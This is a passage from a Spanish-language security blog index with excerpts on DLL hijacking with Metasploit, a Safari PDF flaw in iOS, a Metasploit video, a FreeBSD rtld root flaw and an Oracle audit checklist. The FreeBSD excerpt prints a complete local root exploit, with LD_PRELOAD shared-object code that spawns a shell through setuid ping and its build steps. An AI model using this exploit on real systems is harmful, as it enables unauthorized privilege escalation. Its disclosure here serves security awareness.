DLL Hijacking con Metasploit

Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los  sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articuloExploiting DLL Hijacking Flaws, también ha publicado un kit, para buscar aplicaciones que puedan ser vulnerables a este tipo de ataque DLLHijaAuditKit. Precisamente en esta ocasión les traigo un vídeo de Offensive Security, donde nos enseñan como aprovechar este fallo en Microsoft Office 2007 utilizando el Metasploit Framework. Microsoft ha publicado una solución temporal al fallo (catalogado como critico), pero la solución es que los desarrolladores empiecen a utilizar metodologías de desarrollo seguras, para evitar que sus aplicaciones sean vulnerables. [sam_ad...

Leer Más

Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad

Hace poco vimos como un miembro del Dev-Team mas conocido como @comex nos presentaba un nuevo método de Jailbreak que permitía realizar este procedimiento en cualquier iPhone, iPod Touch e iPad el procedimiento es bastante simple, basta con navegar desde nuestro Safari en una pagina especialmente diseñada, deslizar nuestro dedo y en poco tiempo tendremos el “Jailbrekeado” nuestro dispositivo. En realidad lo que hace el JailbreakMe es explotar una vulnerabilidad en la forma como maneja  los archivos PDF el navegador Safari Mobile, utilizado en los dispositivos móviles de Apple (iPhone, iPod Touch, iPad) para ejecutar código arbitrario, en este caso ejecutar el instalador del Jailbreak. En esta ocasión han explotado una vulnerabilidad en nuestro sistema, para realizar algo que deseábamos (liberar nuestro dispositivo), pero.. ¿que pasaría si una persona mal intencionada aprovecha esta vulnerabilidad?… la respuesta es que podría tomar total control de tu gadget favorito para hacer con el lo que quiera. De momento Apple no ha publicado un parche oficial para solucionar este problema de seguridad, pero afortunadamente Will Strafach un colaborador del proyecto Cydia, ha publicado una solución no oficial para resolver este fallo de seguridad, para instalarlo irónicamente tendrías que tener “Jailbreakeado” tu dispositivo y desde Cydia instalar el hack “PDF Loading Warner“, lo que hace este parche es pedirnos una confirmación en el Safari, cada vez que queramos abrir un archivo PDF (en vez de abrirlo sin pedir permiso como lo hace por defecto). Algunas Recomendaciones: Utilizar un navegador alternativo a Safari Mobile (recomiendo Opera Mini) No abrir ningún archivo PDF desde tu dispositivo móvil. Instalar el hack “PDF Loading Warner” desde Cydia (necesitas realizar el jailbreak en tu equipo) Actualizar a la ultima versión del iOS (al parecer pronto llegara la versión 4.1 del iOS, donde se soluciona este problema) Espero que estés pendientes de las nuevas actualizaciones al iOS y de los archivos que abres en el navegador de tu iPhone, iPod Touch o...

Leer Más

Vídeo: Introducción al Metasploit Framework

Todo aquel individuo que este relacionado con el mundo de la seguridad informática,  debe manejar o por lo menos conocer el metasploit framework,  esta herramienta es fundamental y debe estar en todo “kit de herramientas” de cualquier consultor u auditor de la seguridad de la informacion. Por otra parte, los usuarios que apenas comienzan a indagar sobre la seguridad en los sistemas y que han escuchado hablar sobre el metasploit, preguntan frecuentemente si existe un gran manual  de este framework, el cual sea entendible y completo, en la red existen varios manuales de esta aplicacion,  por ejemplo: Metasploit Framework – User guide (guia oficial) Manual de Metasploit Libro – Metasploit toolkit Sin embargo, como dicen : ” una imagen vale mas que mil palabras” o en este caso un vídeo,  ya que  la gente de Room362 ha publicado un excelente vídeo sobre los fundamentos básicos del proyecto metasploit. Este vídeo quizás es un paso obligado para todos nosotros los newbies en el apasionante  campo de la seguridad informática. [sam_ad...

Leer Más

Fallo en FreeBSD permite obtener root

Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo. El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte variables LD, incluso en los binarios setugid. VERSIONES DE FREEBSD AFECTADAS ********************************** FreeBSD 8.0-RELEASE *** VULNERABLE FreeBSD 7.1-RELEASE *** VULNERABLE FreeBSD 6.3-RELEASE *** NO VULNERABLE FreeBSD 4.9-RELEASE *** NO VULNERABLE Para más detalles ver el exploit. #!/bin/sh echo ** FreeBSD local r00t zeroday echo by Kingcope echo November 2009 cat > env.c << _EOF #include main() { extern char **environ; environ = (char**)malloc(8096); environ[0] = (char*)malloc(1024); environ[1] = (char*)malloc(1024); strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0"); execl("/sbin/ping", "ping", 0); } _EOF gcc env.c -o env cat > program.c << _EOF #include #include #include #include void _init() { extern char **environ; environ=NULL; system("echo ALEX-ALEX;/bin/sh"); } _EOF Para compilar y ejecutar gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles cp w00t.so.1.0 /tmp/w00t.so.1.0 ./env Mas Información en el Full Disclosure publicado por Nikolaos...

Leer Más

¿Que Mirar Cuando Auditamos una Base de Datos Oracle?

Cuando se realiza una auditoria, siempre es recomendable seguir una serie de pasos para no pasar por algo ningún detalle que pueda resultar crucial para nuestra investigación, a continuación les dejo un pequeño listado de las cosas a las que debemos echarle una ojeada cuando auditamos una base de datos oracle. 1). Determinar si en la BD esta activo el modo de operación en ARCHIVELOG o NONARCHIVELOG. Si este no esta activo, la evidencia de ataque o cambios serán sobrescritos por un nuevo redo. Se puede determinar realizando una sentencia SQL a la BD: SELECT VALUE V$PARAMETER WHERE FROM NAME=’archiv_log_start’; 2). Análisis de los Oracle Data Blocks, para determinar: Registros eliminados Localizar bloques asignados a tablas (OBJETOS DE INTERÉS) Seguimiento de Objetos creados y eliminados Localización de tablas eliminadas Localización de Funciones eliminadas 3). Obtención del SID de la BD 4). Enumeración de usuarios SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$; SELECT USERID, COMMENT$TEXT FROM SYS.AUD$; 5). Consultar Ataques de Fuerza bruta o Diccionario a cuentas de usuario SQL> SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$; SELECT NAME, LCOUNT FROM USER$ WHERE LCOUNT>0; SELECT NAME, LTIME FROM USER$ WHERE ASTATUS = 4; 6). Consulta de Ataques de Fuerza Bruta a la cuenta SYS 7). Consulta de intentos del exploit AUTH_ALTER_SESSION SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$; 8). Consulta de intentos de iniciar una sesiÛn la base de datos a travÈs de XML (XDB) SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$; SELECT COMMENT$TEXT FROM SYS.AUD$ WHERE USERID = ‘DBSNMP’; SELECT TERMINAL,SPARE1,TIMESTAMP# FROM SYS.AUD$ WHERE USERID=’DBSNMP’; 9). Consulta si la Auditoria esta habilitada SELECT USER_ID, SESSION_ID, SAMPLE_TIME FROM SYS.WRH$_ACTIVE_SESSION_HISTORY ORDER BY SAMPLE_TIME; SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$; SELECT USERID,ACTION#,TIMESTAMP#,LOGOFF$TIME FROM AUD$; 10). Consulta del archivo sqlnet.log,Agntsrvc.log, spfilesid.ora, o el init.ora todas las ubicaciones referentes a estos parámetros: audit_file_dest        ——-> Sistema de Auditoria (ORACLE_HOME/rdbms/audit) background_dump_dest    ——-> archivo alert.log y tracer de procesos ($ORACLE_HOME/admin/$ORACLE_SID/bdump) core_dump_dest        ——-> archivos Oracle core dump ($ORACLE_HOME/DBS/) db_recovery_file_dest    ——-> redo logs, flashback logs, y RMAN backups user_dump_dest        ——-> Archivos trace debuggin procesos/usuarios (/oracle/utrc) utl_file_dir        ——-> Especifica uno o m·s directorios que Oracle debe utilizar para PL/SQL archivos E/S. control_files        ——-> Especifica uno o varios nombres de archivos de control de Oracle db_create_file_dest    ——-> Especifica la ubicación predeterminada de archivos de datos administrados por Oracle. db_create_online_log_dest_n—-> Especifica la ubicación de los redo logs y file control log_archive_dest    ——-> Es aplicable solo si la BD esta en modo de ARCHIVELOG log_archive_dest_n    ——-> Define hasta 10 archivos de registros logs. 11). Consulta de archivos Log Listener (ORACLE_HOME/network/admin/listener.ora) (lsnrctl status me dara la ubicación actual) 12). Revisión de los LOGS de sentencias(SQL $ORACLE_HOME/bin/LOGIN.SQL,$ORACLE_HOME/dbs/LOGIN.SQL,$ORACLE_HOME/SQLPlus/admin/glogin.sql) 13). Consultando...

Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES

Aprende ONLINE Técnicas HACKING y Seguridad Informática guiad@ por Profesionales RECONOCIDOS con más de 10 años de experiencia REAL en el campo de la Seguridad Informática

Toma acción !AHORA¡
miles ya lo han hecho

NUNCA te enviaremos spam.

  • No necesitas conocimiento previo (De 0 a Ninja)
  • Docentes reconocidos en el medio y con experiencia REAL
  • Clases ONLINE en VIVO que luego podrás repasar si lo deseas desde cualquier parte o cualquier dispositivo
  • Contenidos EXCLUSIVOS generados por nuestros docentes
  • Contacto constante con el docente por distintos medios, antes, durante y después de las clases
  • Laboratorios en linea para que nuestros alumnos practiquen sus conocimientos sin problemas
  • Exclusivo FORO VIP de Alumnos y Ex-Alumnos donde se continúa el aprendizaje y se comparte conocimiento
  • Te entregamos un diploma de certificación por cada curso
  • Miles de ex-alumnos felices